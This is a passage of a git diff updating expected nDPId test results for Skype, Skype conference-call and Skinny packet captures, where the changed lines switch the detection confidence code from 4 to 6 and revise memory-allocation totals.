+00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2975,"source":"skinny.pcap","alias":"nDPId-test","packets-captured":2975,"packets-processed":2967,"total-skipped-flows":0,"total-l4-payload-len":498712,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":55,"global_ts_msec":1317801153428} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 2975/2967 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 498712 bytes +~~ total detected protocols..: 9 +~~ total active/idle flows...: 9/9 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6097600 bytes +~~ total memory freed........: 6097600 bytes +~~ total allocations/frees...: 123875/123875 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 462 chars +~~ json string max len.......: 742 chars +~~ json string avg len.......: 601 chars diff --git a/test/results/skype-conference-call.pcap.out b/test/results/skype-conference-call.pcap.out index 06111c11e..1f1923671 100644 --- a/test/results/skype-conference-call.pcap.out +++ b/test/results/skype-conference-call.pcap.out @@ -2,10 +2,10 @@ 00561{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1501061916646} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1501061916646,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1501061916646,"pkt":"XEl5dU5qxCwDBkn+CABFAACEzEwAAEARWwHAqAIUaC4oMcCC7OIAcIaYAAEAVCESpELFWk\/f3gwyXjBMYMcABgAJZ3BwZTp6V3lrAAAAACQABG7\/\/v+AKgAIAAAAAAC\/QxeAVAABMQAAAIBwAAQAAAADAAgAFMOSZmY4XAmhNOQKDGwu8wYai2KrgCgABB+1m2s="} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1501061916646,"flow_last_seen":1501061916646,"flow_idle_time":200000,"flow_min_l4_payload_len":104,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1501061916646,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1501061916653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1501061916653,"pkt":"xCwDBkn+XEl5dU5qCABFAACERTYAAG4RtBdoLigxwKgCFOziwIIAcHm6AAEAVCESpEI8yF2moGJ4zvU2wuEABgAJeld5azpncHBlAAAAACQABG7\/\/v+AKQAIAAAAAAACl5OAVAABMQAAAIBwAAQAAAADAAgAFHnv8xovieyQrsQ6j2MMyqg8GNj1gCgABORvfhY="} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1501061916690,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":114,"pkt_l4_len":80,"thread_ts_msec":1501061916690,"pkt":"XEl5dU5qxCwDBkn+CABFAABkjWYAAEARmgfAqAIUaC4oMcCC7OIAUFnEAQEANCESpEI8yF2moGJ4zvU2wuEAIAAIAAHN8Ek8jHOAcAAEAAAAAwAIABSgsacIkgIOfzKEQbuerkeFTLj204AoAASK\/70B"} -00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00845{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":200,"flow_first_seen":1501061916646,"flow_last_seen":1501061918151,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":915,"flow_tot_l4_payload_len":31287,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1501061918151,"l3_proto":"ip4","src_ip":"192.168.2.20","dst_ip":"104.46.40.49","src_port":49282,"dst_port":60642,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00573{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":200,"source":"skype-conference-call.pcap","alias":"nDPId-test","packets-captured":200,"packets-processed":200,"total-skipped-flows":0,"total-l4-payload-len":31287,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1501061918151} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 200/200 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5883451 bytes -~~ total memory freed........: 5883451 bytes -~~ total allocations/frees...: 118316/118316 +~~ total memory allocated....: 6017085 bytes +~~ total memory freed........: 6017085 bytes +~~ total allocations/frees...: 121078/121078 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 477 chars ~~ json string max len.......: 850 chars diff --git a/test/results/skype.pcap.out b/test/results/skype.pcap.out index a62ad84dd..6105a9ff6 100644 --- a/test/results/skype.pcap.out +++ b/test/results/skype.pcap.out @@ -2,74 +2,74 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"skype.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1431969639825} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431969641947,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969641947,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt5UAAEARP6TAqAEiwKgBAcALADUALIa2zTYBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"skype.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641947,"flow_last_seen":1431969641947,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641947,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49163,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431969641948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969641948,"pkt":"0NQSxnP1PBXCt3IOCABFAABA5KYAAEAREpPAqAEiwKgBAeA+ADUALBXIHdcBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} -00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"skype.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969641948,"flow_last_seen":1431969641948,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969641948,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57406,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"b.config.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDTB0AAEARqxnAqAEiwKgBAdmfADUAL7TEHKMBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"skype.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":55711,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1431969642087,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1431969642087,"pkt":"0NQSxnP1PBXCt3IOCABFAABDfx0AAEAReBnAqAEiwKgBAc5yADUAL8ad+vYBAAABAAAAAAAABGNvbm4Fc2t5cGUGYWthZG5zA25ldAAAHAAB"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"skype.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642087,"flow_last_seen":1431969642087,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431969642087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":52850,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"conn.skype.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1431969642244,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969642244,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7CqYAAEAR7JjAqAEiwKgBAdR8ADUAJ+nL8sABAAABAAAAAAAAA2FwaQVza3lwZQNjb20AAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"skype.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642244,"flow_last_seen":1431969642244,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642244,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":54396,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1431969642247,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431969642247,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7ECYAAEAR5xjAqAEiwKgBAf+SADUAJwCOlegBAAABAAAAAAAAA2FwaQVza3lwZQNjb20AABwAAQ=="} -00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"skype.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642247,"flow_last_seen":1431969642247,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969642247,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65426,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"api.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1431969642318,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969642318,"pkt":"0NQSxnP1PBXCt3IOCABFAABE3usAAEARGErAqAEiwKgBAfpVADUAMOQoL9MBAAABAAAAAAAABWU3NzY4AWIKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"skype.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969642318,"flow_last_seen":1431969642318,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969642318,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":64085,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e7768.b.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 